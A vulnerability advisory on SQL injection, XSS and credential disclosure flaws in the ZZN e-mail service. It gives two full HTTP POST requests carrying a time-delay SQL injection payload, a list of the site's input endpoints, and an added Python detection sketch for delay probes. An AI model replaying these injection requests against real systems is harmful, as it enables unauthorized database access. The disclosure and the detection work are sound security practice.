ZZN SQL Injection/XSS/Credential Disclosure Vulnerabilities
Release date: 2013-08-09
Updated: 2013-08-11
Affected systems:
zzn zzn
Description:
--------------------------------------------------------------------------------
CVE(CAN) ID: CVE-2007-0177
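ZZN is a virtual-hosted e-mail service.
The ZZN implementation contains multiple XSS, remote blind SQL injection, and credential disclosure vulnerabilities, which can allow a remote attacker to perform unauthorized database operations, among other things.
<*Source: Juan Carlos García
Link: http://packetstormsecurity.com/files/122763/ZZN-SQL-Injection-XSS-Credential-Disclosure.html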
*>
Test method:
--------------------------------------------------------------------------------
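Warning
The following program (method) may be offensive in nature and is provided for security research and teaching only. Use at your own risk!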
1-URL encoded POST input company was set to X'; WAIT FOR DELAY '0:0:4' --
POST /membersarea_en/support_abuse.asp HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Cookie: BIGipServerp-vzzn=3540124170.20480.0000; ASPSESSIONIDCACSTCRR=LOBIKGEDEGMDAPNNMPGPGHHE; ASPSESSIONIDACCSTCRR=GPBIKGEDMBJEMAJEEMDILMMC
Host: www.zzn.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*
beenThere=yeah&company=X%27%3b%20waitfor%20delay%20%270%3a0%3a2%27%20--%20&Complaint=secnight&[email protected]&FirstName=secnight&inout=fromzzn&LastName=secnight&Phone=555-666-0606&RetURL=http%3a%2f%2fwww.zzn.com
%2fmembersarea_en&SpamCopy=&[email protected]&VirtIP=
2-URL encoded POST input company was set to X'; WAIT FOR DELAY '0:0:4' --
POST /membersarea_en/support_abuse.asp HTTP/1.1
Content-Length: 280
Content-Type: application/x-www-form-urlencoded
Cookie: BIGipServerp-vzzn=3540124170.20480.0000; ASPSESSIONIDCACSTCRR=LOBIKGEDEGMDAPNNMPGPGHHE; ASPSESSIONIDACCSTCRR=GPBIKGEDMBJEMAJEEMDILMMC
Host: www.zzn.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*
beenThere=yeah&company=X%27%3b%20waitfor%20delay%20%270%3a0%3a2%27%20--%20&Complaint=secnight&[email protected]&FirstName=secnight&inout=fromzzn&LastName=secnight&Phone=555-666-0606&RetURL=http%3a%2f%2fwww.zzn.com
%2fmembersarea_en&SpamCopy=&[email protected]&VirtIP=
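A detection sketch for the time-delay probe shown in the requests above, added here as an example and not part of the original advisory. It percent-decodes a form body and flags parameters carrying a database delay primitive. The names `scan_form_body`, `DELAY_RULES` and `STACKED` are hypothetical, and the rules beyond WAITFOR DELAY go past what the advisory shows.

```python
import re
from urllib.parse import parse_qsl

# Time-delay primitives used in blind SQL injection probes. WAITFOR DELAY is
# the one in the requests above; the other rules are an added generalization.
DELAY_RULES = [
    ("mssql-waitfor", re.compile(r"\bwait\s*for\s+(?:delay|time)\s+'[\d:.]+'", re.I)),
    ("mysql-sleep", re.compile(r"\bsleep\s*\(\s*\d+", re.I)),
    ("mysql-benchmark", re.compile(r"\bbenchmark\s*\(\s*\d+", re.I)),
    ("postgres-pg_sleep", re.compile(r"\bpg_sleep\s*\(\s*\d+", re.I)),
]
# A closing quote followed by ';' means the value tries to start a second statement.
STACKED = re.compile(r"'\s*;")


def scan_form_body(body):
    """Return (parameter, rule, stacked) for each delay probe in a urlencoded body."""
    findings = []
    # parse_qsl percent-decodes each value, so %27%3b%20waitfor is seen as "'; waitfor".
    for name, value in parse_qsl(body, keep_blank_values=True):
        for rule, pattern in DELAY_RULES:
            if pattern.search(value):
                findings.append((name, rule, bool(STACKED.search(value))))
    return findings


# Body from the request above, shortened (obscured e-mail fields left out).
SAMPLE_PROBE = (
    "beenThere=yeah&company=X%27%3b%20waitfor%20delay%20%270%3a0%3a2%27%20--%20"
    "&Complaint=secnight&FirstName=secnight&inout=fromzzn&LastName=secnight"
)
# Constructed benign submission: the words alone must not trigger the rule.
SAMPLE_BENIGN = "beenThere=yeah&company=Waitfor+Delay+Ltd&Complaint=slow+reply"

if __name__ == "__main__":
    for label, body in (("probe", SAMPLE_PROBE), ("benign", SAMPLE_BENIGN)):
        print(label, scan_form_body(body))
```

Matching on decoded values only complements the real fix, which is to bind `company` and the other form fields as query parameters on the server side.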
Proof Of Concept
----------------
These files have at least one input (GET or POST).
/membersarea_en/home.asp - 3 inputs
/membersarea_en/joinframes.asp - 2 inputs
/membersarea_en/emailaccount.asp - 4 inputs
/membersarea_en/preminder.asp - 1 inputs
/membersarea_en/signup.asp - 2 inputs
/membersarea_en/support.asp - 1 inputs
/membersarea_en/insidelogin.asp - 2 inputs
/membersarea_en/directemailerror.asp - 1 inputs
/membersarea_en/alertwindow.asp - 1 inputs
/membersarea_en/loginerror.asp - 1 inputs
/membersarea_en/support_abuse.asp - 1 inputs
/membersarea_en/copy%20of%20emailaccount.asp - 1 inputs
/membersarea_en/directregister.asp - 1 inputs
/zlog - 1 inputs
/zlog/blog_error.asp - 1 inputs
Recommendation:
--------------------------------------------------------------------------------
Vendor patch:
zzn
---
The vendor has not yet provided a patch or upgrade. We recommend that users of this software watch the vendor's home page for the latest version: